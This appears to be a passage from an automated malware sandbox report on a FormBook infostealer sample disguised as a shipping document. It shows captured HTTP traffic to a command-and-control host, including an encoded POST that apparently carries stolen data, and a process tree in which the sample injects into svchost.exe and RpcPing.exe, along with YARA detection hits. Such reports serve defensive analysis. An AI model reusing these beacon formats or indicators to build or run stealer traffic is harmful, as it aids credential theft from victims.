                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 46 6b 38 32 32 6b 34 31 34 57 34 4c 45 79 30 57 75 65 49 2b 56 54 53 69 64 6f 58 6f 37 4a 57 69 51 51 70 4e 4c 34 77 64 71 72 6a 58 63 69 33 41 35 59 49 66 6e 64 67 54 59 55 50 4d 6e 53 70 42 34 34 36 59 2f 34 4b 36 2b 33 6d 67 67 51 6b 56 6b 79 6f 34 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:41:57.130189896 CEST518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDdlZWViYmMtMWM5My00NzZkLThkN2MtOTlkMGFmMTVjZDNlIiwicGFnZV90aW1lIjoxNzIwMDIxMzE3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            60192.168.11.2049835199.59.243.22680
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:59.662462950 CEST1289OUTPOST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 4e 62 46 30 67 51 34 72 33 2b 43 4b 49 73 66 52 58 32 73 2f 37 46 42 4d 37 30 63 30 78 59 54 4a 4e 7a 2f 62 48 46 32 65 70 44 4a 51 4f 53 72 39 4c 62 36 4e 6b 62 67 6c 42 49 7a 58 72 59 2f 50 73 67 51 6b 45 57 42 44 6a 61 67 30 5a 75 43 47 76 68 31 52 2b 4f 31 72 72 4e 69 50 58 6c 59 2f 36 58 4d 79 33 46 72 53 32 74 70 72 79 78 67 42 6e 35 57 66 42 38 2b 46 53 33 5a 5a 6c 47 33 64 77 5a 78 69 52 75 45 37 50 50 7a 35 62 79 50 6f 5a 5a 74 47 4f 54 4d 2b 63 6c 48 32 64 52 50 5a 7a 51 38 78 41 75 4f 50 61 74 6e 34 2b 61 45 62 5a 71 53 4c 79 55 35 74 41 66 74 68 44 4f 6c 54 38 59 63 43 48 6c 74 77 36 63 33 68 34 4d 6d 5a 4a 4a 67 4a 30 39 4e 6a 66 52 51 57 42 37 53 35 54 48 46 65 78 73 68 50 42 78 5a 71 6c 4e 59 66 4b 71 55 6d 63 48 73 75 36 63 55 76 38 4f 62 46 2b 73 49 53 6b 43 6a 32 51 61 46 6a 63 51 2f 6c 54 5a 58 67 32 33 72 7a 37 32 4e 62 31 5a 75 4c 75 6e 77 6b 53 2b 56 76 74 59 68 35 2f 58 33 6c 38 47 43 32 64 51 77 47 30 54 55 57 63 52 33 51 38 59 77 37 38 39 51 63 67 38 47 47 6b 4f 33 [TRUNCATED]
                                                            Data Ascii: vX=NbF0gQ4r3+CKIsfRX2s/7FBM70c0xYTJNz/bHF2epDJQOSr9Lb6NkbglBIzXrY/PsgQkEWBDjag0ZuCGvh1R+O1rrNiPXlY/6XMy3FrS2tpryxgBn5WfB8+FS3ZZlG3dwZxiRuE7PPz5byPoZZtGOTM+clH2dRPZzQ8xAuOPatn4+aEbZqSLyU5tAfthDOlT8YcCHltw6c3h4MmZJJgJ09NjfRQWB7S5THFexshPBxZqlNYfKqUmcHsu6cUv8ObF+sISkCj2QaFjcQ/lTZXg23rz72Nb1ZuLunwkS+VvtYh5/X3l8GC2dQwG0TUWcR3Q8Yw789Qcg8GGkO31wotC5WwDNXeHPgeo8iaVht3Ar/XXn5fL+WG6fWYoy+dD00ouwrvbUXHc9idz6GnIUbiDSGQjNyDgEYBot7kNUOhs3IQQAHh0Dv12xIvs71uTYqivPksUiEvcyGsoI/ONV8UT4BUwGW3JLygyZ3Jtv3NBTeCrGJvOZKTOTlBQcl7yK7kO/kYQLdiaBr5P2BsTxyl0rW7b4O0/bNODlldkCr6MJ4MFi7/S3gHT8AzLsm2WXdUR8mofevZsfGU6qQuNgG+BJ/IgWNmNYcAwtXfsf8AvR24ERxwq3BvkAYvB3TtMNKanVEeZgz8RGYEabmx128MFieDcTfsqIO6bs2LVz0YF3EnUnN4zC6GczZ0IWZ
                                                            Jul 3, 2024 17:41:59.662508965 CEST5156OUTData Raw: 30 49 43 75 35 42 48 65 51 6d 68 32 76 62 64 4f 6d 52 4c 39 4a 77 4c 6c 35 4e 6d 4a 2f 37 46 49 6a 57 53 36 69 6a 57 30 45 70 67 6c 6e 55 68 72 39 71 46 67 61 33 6b 69 62 4d 37 57 2f 6b 74 55 4d 65 6f 58 6c 64 73 7a 4c 64 7a 6a 50 55 56 64 2b 4d
                                                            Data Ascii: 0ICu5BHeQmh2vbdOmRL9JwLl5NmJ/7FIjWS6ijW0EpglnUhr9qFga3kibM7W/ktUMeoXldszLdzjPUVd+Mh8o+VdSAI+hqpq2JV7zw4VZmicKVgyT1N9sh11E3BYpFYcf5C8HalXvIidxa5esAjWP3GY+qbvn8NlrasbUJCxrrGhWHt79bhMK4dPydlfvrlXn9VEtZ395Rx1XAwyP3OirgwHG0AwSTsg/TEPVqW7leHHDvgFYAP
                                                            Jul 3, 2024 17:41:59.662580967 CEST6445OUTData Raw: 53 66 36 72 42 45 77 69 56 48 37 73 79 76 35 57 71 78 38 75 2f 57 4a 62 47 2f 76 65 78 78 4b 65 69 50 71 6d 4d 78 55 46 65 49 75 73 72 66 58 62 72 34 4f 76 68 6b 33 4f 4f 65 61 2b 71 6d 5a 2f 55 67 77 61 5a 2f 51 68 31 37 6c 4c 4b 71 37 6f 76 37
                                                            Data Ascii: Sf6rBEwiVH7syv5Wqx8u/WJbG/vexxKeiPqmMxUFeIusrfXbr4Ovhk3OOea+qmZ/UgwaZ/Qh17lLKq7ov71ri5XDx4Iu6OKAkBl2EQ1EQYnThloWMT3crGYugAYj7pMkWwn4L2rumREhijfccYUcqzfIvU8jlp7XyO9h9tnP9L3jYJl5p1dIrSk6iuJb8DhD/twfzzx523HK5rhZ/R9dLXdYFDl4VLeRQ/8DaH2ncbyykwVQGFQ
                                                            Jul 3, 2024 17:41:59.781229019 CEST2578OUTData Raw: 79 4a 44 2b 55 67 7a 52 6d 52 67 58 4e 70 47 6d 67 64 38 75 55 66 54 53 6a 5a 52 62 7a 45 31 62 4e 74 49 76 53 47 67 7a 31 43 4f 46 77 4c 48 37 31 75 34 61 43 6f 6b 46 4c 71 32 6a 34 6c 59 30 79 77 73 41 2f 36 2f 33 6c 65 79 55 54 4c 37 2f 76 46
                                                            Data Ascii: yJD+UgzRmRgXNpGmgd8uUfTSjZRbzE1bNtIvSGgz1COFwLH71u4aCokFLq2j4lY0ywsA/6/3leyUTL7/vFwkGGVM+jzB1ay5Ip4mK+Eik7qoMqJflkETnhZF30ktV6Kl7iSlOPV3lb4qnHPBi+nkyYIe6kwnQ7A4QTSen4sXEvpvd9eUzdjpmwEiPqvpjDIWMK5ItdPedM5NbJNXMsxdWp60+Zz2TEzWakDiUnIpzGQnVskC5r7
                                                            Jul 3, 2024 17:41:59.781378031 CEST5156OUTData Raw: 31 64 62 7a 31 57 68 63 4b 47 34 63 30 67 31 69 67 6d 4e 39 30 6b 52 43 70 78 69 32 52 33 34 4a 79 65 4a 47 69 67 68 2f 44 67 76 4a 65 44 32 69 69 49 68 6b 34 61 41 4c 43 6a 44 38 37 56 67 37 46 2f 37 47 79 78 50 6e 69 76 6f 43 52 33 34 74 42 4a
                                                            Data Ascii: 1dbz1WhcKG4c0g1igmN90kRCpxi2R34JyeJGigh/DgvJeD2iiIhk4aALCjD87Vg7F/7GyxPnivoCR34tBJunyT5+VMP1F7vjE6x+4f+Jmgxx0oTOUbFHu2UG9xMfM4jxq+c314hRoCJxwOi7DQ9X871AyHnNhjdies9y92fQqvgBjNSrW3VWks4sY8Z1/65GWOuHo/GY9FyICIKrixcidAh9MELA4uaQLq5Br3D3cFOVDVQLkgH
                                                            Jul 3, 2024 17:41:59.781572104 CEST15468OUTData Raw: 35 48 69 31 70 78 36 38 4e 4b 32 65 71 6c 48 56 77 6c 69 61 71 63 45 79 46 78 6d 42 58 38 61 4b 68 56 43 75 47 78 37 34 30 6f 66 68 78 39 69 61 68 72 42 59 4e 75 58 34 76 4b 39 55 59 6a 4f 32 50 38 4e 6f 4e 4c 51 77 41 47 35 78 72 4d 69 64 61 71
                                                            Data Ascii: 5Hi1px68NK2eqlHVwliaqcEyFxmBX8aKhVCuGx740ofhx9iahrBYNuX4vK9UYjO2P8NoNLQwAG5xrMidaq0UR+eNyMO9+Fx0niu8PhCNwLLlLoHEnGd/8ZsJQ68uuroYRmwLV3j53rSlVOWplYp3ylceVDya6WxEEKXZZNFO2dBzCJZtwfNZ2cjDnqOWYoyA2m84aFYeWUlB+meqg5VCiZDlNOm+fi1b8bAiWrt+KzSnKRb1ELZ
                                                            Jul 3, 2024 17:41:59.781743050 CEST1289OUTData Raw: 6f 79 4e 39 45 37 67 77 71 63 4e 46 49 61 70 4f 5a 47 54 4b 4f 79 30 45 30 34 69 55 55 39 31 79 73 75 56 44 33 6a 39 4c 78 67 6f 55 37 61 57 54 38 65 2b 5a 56 72 71 74 47 34 65 32 2b 4b 67 62 7a 32 69 41 52 34 46 59 7a 43 39 4e 79 76 37 42 75 4e
                                                            Data Ascii: oyN9E7gwqcNFIapOZGTKOy0E04iUU91ysuVD3j9LxgoU7aWT8e+ZVrqtG4e2+Kgbz2iAR4FYzC9Nyv7BuNsR0k6aPbqTrc3dYTTJ7VDyYbdVyEC2nAN1Y6aPcKU8D5iMlfjwtyY9PTL4wZLBdo6060fwT5mk4TY71bsSwd1ny8ZRMyGnYEuZ0YzbBm8ue4dI41MfZiNjBsbEy/Wd0wxYfIgzTnmUtZbgM7dog2yxskG7I4akrHB
                                                            Jul 3, 2024 17:41:59.781915903 CEST1289OUTData Raw: 69 59 65 75 6c 6f 4b 6f 2b 52 51 6a 70 39 75 36 35 56 42 46 47 49 38 6f 6f 4e 4d 6e 52 74 71 4f 64 54 79 33 56 53 32 63 75 4d 47 70 42 64 72 62 4b 52 4a 34 63 70 4e 58 2f 51 6a 31 58 75 32 2f 50 4f 70 74 66 66 4a 73 4b 77 6b 62 62 56 39 33 33 66
                                                            Data Ascii: iYeuloKo+RQjp9u65VBFGI8ooNMnRtqOdTy3VS2cuMGpBdrbKRJ4cpNX/Qj1Xu2/POptffJsKwkbbV933fviPtXMQX3evkL5cqftdhfLPw5e3inZRb5XPZacvGFXggKiO6wYmW3eQgk1+ItO6GPOUGdgRe1BNpXpvRM8XNYOlti2fHBNFzotANDz/XyQpGALyZ1A50agc13kEfqTBCKoPl2kUTYTMmSXid42HyqSvM/xpyW8pzl
                                                            Jul 3, 2024 17:41:59.900074005 CEST2578OUTData Raw: 71 7a 70 4a 48 75 38 6b 6b 37 4d 61 6f 39 5a 4a 73 72 65 6b 53 4f 62 69 35 31 76 6f 55 56 47 62 51 61 59 63 6e 70 4b 79 4f 68 64 6f 65 4a 67 46 36 32 50 55 76 34 6d 61 48 45 33 63 53 33 56 42 35 32 48 76 74 78 47 71 63 56 6e 7a 6a 32 54 43 66 50
                                                            Data Ascii: qzpJHu8kk7Mao9ZJsrekSObi51voUVGbQaYcnpKyOhdoeJgF62PUv4maHE3cS3VB52HvtxGqcVnzj2TCfPWGG8aYlR0Ov/XbKDSwMlWrhwxpHMvUgJ0AazYyRZaqfys3kVDZsB3eKi3NMZYw9FCfztB12Q+PVwUKcUogTkPyn0IIl90tQByB0Q5MPI/gKWB2Jmzu9Bgxd0iyfBW2lVVPyQlrg8CegZNecVO/2qMbEnJMw8iMoEY
                                                            Jul 3, 2024 17:41:59.900250912 CEST7734OUTData Raw: 4b 43 64 56 2b 64 30 6a 70 67 42 6e 62 65 71 44 48 66 52 35 69 45 6c 4f 37 35 7a 48 53 38 55 36 4b 54 77 36 65 6a 5a 6f 73 76 44 7a 58 74 6a 6d 34 2f 76 32 58 55 71 68 32 43 46 34 63 66 7a 52 54 77 61 57 31 78 5a 53 75 47 55 58 7a 61 31 69 38 69
                                                            Data Ascii: KCdV+d0jpgBnbeqDHfR5iElO75zHS8U6KTw6ejZosvDzXtjm4/v2XUqh2CF4cfzRTwaW1xZSuGUXza1i8imKMTNEvqxg3+ldhUrhPVXSf21f+UwVxYHus9LKXaacbzsSzCSC0QBH/FuUsDows4gO7avegmS0En4oSjvW7mn3cqTa0LJNNjMdGuH+rbKHuz5jxYcqG1L0M/CjgJ4IkIgRBh2sYzlB3inzGfY4MfP6Q4BMODdvs6M
                                                            Jul 3, 2024 17:41:59.900413990 CEST1289OUTData Raw: 59 4a 78 53 42 63 65 65 45 74 6c 43 77 59 38 76 72 6a 4b 5a 74 37 72 52 32 36 47 42 71 51 4e 38 78 4f 4f 68 52 4b 2f 52 2f 38 4f 35 65 63 75 39 7a 52 30 6d 4b 41 30 4e 2f 6a 36 78 46 2f 66 61 32 52 39 34 4b 45 43 61 59 4d 36 77 50 4c 32 44 45 76
                                                            Data Ascii: YJxSBceeEtlCwY8vrjKZt7rR26GBqQN8xOOhRK/R/8O5ecu9zR0mKA0N/j6xF/fa2R94KECaYM6wPL2DEvfzgHf82cX+H8kqwycHGuksDnis6jtIvYPoMri0u6pJY0oe+YyHO99oSrk3mCHEPezw4PDHrqUzkNkjaYteFCwSSJGyta/1CFRz3d48NO7OfbdC5y+BTPuxNgZJwGpJ4fhveMuFqLufbxRWxn61ZB4vWNjxbwIEjp9
                                                            Jul 3, 2024 17:42:00.039623022 CEST1289INHTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:41:59 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: 12225b8d-c1e5-482f-a122-1e3a8ac385a2
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=12225b8d-c1e5-482f-a122-1e3a8ac385a2; expires=Wed, 03 Jul 2024 15:56:59 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 46 6b 38 32 32 6b 34 31 34 57 34 4c 45 79 30 57 75 65 49 2b 56 54 53 69 64 6f 58 6f 37 4a 57 69 51 51 70 4e 4c 34 77 64 71 72 6a 58 63 69 33 41 35 59 49 66 6e 64 67 54 59 55 50 4d 6e 53 70 42 34 34 36 59 2f 34 4b 36 2b 33 6d 67 67 51 6b 56 6b 79 6f 34 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            61192.168.11.2049836199.59.243.22680
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:42:02.330769062 CEST521OUTGET /c7lp/?vX=AZtUjmxX1+ilQa3cAX9z1397/CoXyobuelvuG0qO50IIYxbQIoa2zaoIA52olqXa0ysfLjRam7UGaI/Eozxq/aJIiPqlVVE06lZEm1LC+u5u0D0LnPSZBcs=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:42:02.473639965 CEST1289INHTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:42:02 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1466
                                                            x-request-id: 08e83773-d4e6-4b89-8c23-8b813220a2e2
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GBCzeUnU5TO+MREERbxCb4copKTT2ACdMEZ0YR6PCQKM4hwE0OK+fQkd1IqsiheKv0gcsYkqHA1LzQsE0kCJQQ==
                                                            set-cookie: parking_session=08e83773-d4e6-4b89-8c23-8b813220a2e2; expires=Wed, 03 Jul 2024 15:57:02 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 47 42 43 7a 65 55 6e 55 35 54 4f 2b 4d 52 45 45 52 62 78 43 62 34 63 6f 70 4b 54 54 32 41 43 64 4d 45 5a 30 59 52 36 50 43 51 4b 4d 34 68 77 45 30 4f 4b 2b 66 51 6b 64 31 49 71 73 69 68 65 4b 76 30 67 63 73 59 6b 71 48 41 31 4c 7a 51 73 45 30 6b 43 4a 51 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GBCzeUnU5TO+MREERbxCb4copKTT2ACdMEZ0YR6PCQKM4hwE0OK+fQkd1IqsiheKv0gcsYkqHA1LzQsE0kCJQQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:42:02.473654032 CEST866INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDhlODM3NzMtZDRlNi00Yjg5LThjMjMtOGI4MTMyMjBhMmUyIiwicGFnZV90aW1lIjoxNzIwMDIxMzIyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:11:33:48
                                                            Start date:03/07/2024
                                                            Path:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
                                                            Imagebase:0x400000
                                                            File size:1'182'720 bytes
                                                            MD5 hash:D0AA9DAE95EF6311340A157817230BF0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:11:33:49
                                                            Start date:03/07/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
                                                            Imagebase:0xc80000
                                                            File size:47'016 bytes
                                                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:11:34:21
                                                            Start date:03/07/2024
                                                            Path:C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe"
                                                            Imagebase:0x510000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:4
                                                            Start time:11:34:23
                                                            Start date:03/07/2024
                                                            Path:C:\Windows\SysWOW64\RpcPing.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                                                            Imagebase:0x4b0000
                                                            File size:26'624 bytes
                                                            MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
